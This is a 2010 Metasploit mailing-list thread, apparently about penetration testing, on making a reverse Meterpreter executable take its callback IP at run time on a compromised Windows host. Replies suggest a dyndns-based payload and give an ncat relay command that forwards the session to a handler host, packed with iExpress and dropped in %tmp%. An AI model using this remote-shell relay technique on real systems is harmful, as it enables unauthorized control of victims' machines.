Metasploit mailing list archives

Re: passing LHOST IP on command line

From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Wed, 10 Nov 2010 16:02:03 +0300

Even though I have no smart answer, but I think you'll have to pack
the meterpreter.exe with ncat.exe using iExpress and drop them at
%tmp% or something, then do port forwarding:

Multi/Handler : LPORT=4444
Meterpreter: LHOST=127.0.0.1 LPORT=9999
ncat -l 9999 -e "ncat MULTI_HANDLER_IP 4444"

so, my final answer would  be : one iExpress exe that contains
meterpreter.exe that always connect to 127.0.0.1, ncat to do port
forwarding and an optional dos batch file that will take
themulti/handler's ip as a command argument "%1"

Regards,
Sherif Eldeeb.


On Wed, Nov 10, 2010 at 3:09 PM, Robin Wood <robin () digininja org> wrote:

On 10 November 2010 11:40, Oliver Kleinecke <okleinecke () web de> wrote:

I`d suggest to use the windows/meterpreter/reverse_tcp_dns payload, set its LHOST-value to a dyndns-name and set up 
a dyndns-client on your listener-host.
Hope this helps =).


Unfortunately on an internal test without internet access this won't help.

Robin

best regards
Oliver

-----Ursprüngliche Nachricht-----
Von: "Robin Wood" <robin () digininja org>
Gesendet: 10.11.2010 11:41:28
An: "Metasploit List" <framework () spool metasploit com>
Betreff: [framework] passing LHOST IP on command line

Is it possible to build a reverse meterpreter exe that will take its
LHOST as a command line argument rather than being hard coded?

The scenario I have is:

Got command line access to a windows box through the windows psexec
and managed to use tftp to bring files across to the compromised
machine. I'd like to have generic 32 and 64 bit exes stored on my tftp
server that I can copy across and then run them giving the IP of my
multi handler machine.

This just seems easier than having to compile a new exe on each job
because my IP is different every time.

Robin
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

___________________________________________________________
WEB.DE DSL Doppel-Flat ab 19,99 &euro;/mtl.! Jetzt auch mit
gratis Notebook-Flat! http://produkte.web.de/go/DSL_Doppel_Flatrate/2

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

passing LHOST IP on command line Robin Wood (Nov 10)
- Re: passing LHOST IP on command line Oliver Kleinecke (Nov 10)
  - Re: passing LHOST IP on command line Robin Wood (Nov 10)
    - Re: passing LHOST IP on command line Sherif El-Deeb (Nov 10)
    - Re: passing LHOST IP on command line Robin Wood (Nov 10)
- Re: passing LHOST IP on command line Jonathan Cran (Nov 10)
  - Re: passing LHOST IP on command line Robin Wood (Nov 10)
    - Message not available
    - Re: passing LHOST IP on command line Kevin Shaw (Nov 10)
    - Re: passing LHOST IP on command line Carlos Perez (Nov 10)
- Re: passing LHOST IP on command line HD Moore (Nov 10)
  - Re: passing LHOST IP on command line Robin Wood (Nov 10)
- <Possible follow-ups>
- Re: passing LHOST IP on command line archeldeeb (Nov 10)
  - Re: passing LHOST IP on command line Robin Wood (Nov 10)